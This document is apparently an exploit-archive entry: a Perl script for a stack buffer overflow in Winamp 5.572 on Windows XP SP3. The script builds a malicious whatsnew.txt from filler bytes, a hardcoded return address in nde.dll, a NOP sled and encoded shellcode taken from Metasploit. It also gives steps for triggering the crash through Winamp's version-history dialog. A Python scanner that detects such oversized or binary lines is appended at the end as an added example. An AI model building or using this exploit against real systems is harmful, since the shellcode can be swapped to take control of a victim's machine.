Winamp v5.572 whatsnew.txt WinXP SP3 Local Overflow Vulnerability

# Tested on: WinXP SP3 De

#!/usr/bin/perl

# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow    #\n";
print "# PoC by: Debug (eldadru\@gmail.com)     #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";

print "                        __        __________________\n";
print "             ________  /  //      / / ____  / ____  / ________\n";
print "  ________  /_______/ / /// //    / / /___/ / /   / / /_______/ ________ \n";
print " /_______/ _______   / /  // //  / / /_____/ /   / / ________  /_______/\n";
print "          /_______/ / /    // /// / /_____/ /___/ / /_______/\n";
print "                   /_/      //__/_______/_______/\n";
print "                   Where's the next phone box to the matrix please?\n\n\n";



my $version = "Winamp 5.572";

my $junk = "\x41" x 540;                 # filler up to the saved return address
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD    FFD4    CALL ESP nde.dll
my $nop = "\x90" x 100;                  # NOP sled in front of the payload

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";

open (myfile,'>> whatsnew.txt') or die "cannot open whatsnew.txt: $!";
print myfile $version.$junk.$eip.$nop.$shellcode;
close (myfile);

print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";
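A defender-side check for the trigger this PoC relies on (a single oversized, non-text line in whatsnew.txt). This is an added example, not part of the original exploit: the file name and the 540-byte filler length come from the PoC above; the threshold, the printable-byte rule and the sample inputs are assumptions constructed for the demonstration.

```python
import re
from typing import List, Tuple

# The PoC pads one line of whatsnew.txt with 540 filler bytes before the
# saved return address; a legitimate version-history file never carries a
# line that long, nor raw binary bytes.
JUNK_LEN = 540          # filler length used by the PoC above
MAX_LINE = JUNK_LEN     # assumed threshold: flag lines at or above the padding
# assumed rule for a plain-text changelog: tab, LF, CR and printable ASCII only
PRINTABLE = re.compile(rb"^[\x09\x0a\x0d\x20-\x7e]*$")


def scan_whatsnew(data: bytes) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for every line that looks like overflow input."""
    findings: List[Tuple[int, str]] = []
    for n, line in enumerate(data.split(b"\n"), start=1):
        if len(line) >= MAX_LINE:
            findings.append((n, f"line length {len(line)} >= {MAX_LINE}"))
        if not PRINTABLE.match(line):
            findings.append((n, "non-printable bytes in a text file"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when whatsnew.txt should be quarantined rather than loaded."""
    return bool(scan_whatsnew(data))


# Constructed inputs (not taken from the page): a benign changelog, and a file
# shaped like the PoC output (version string + long filler + NOP-like bytes).
BENIGN = b"Winamp 5.572\n* fixed a crash in the playlist editor\n* updated codecs\n"
MALFORMED = b"Winamp 5.572" + b"A" * JUNK_LEN + b"\x90" * 16

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malformed", MALFORMED)):
        print(name, scan_whatsnew(blob))
```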
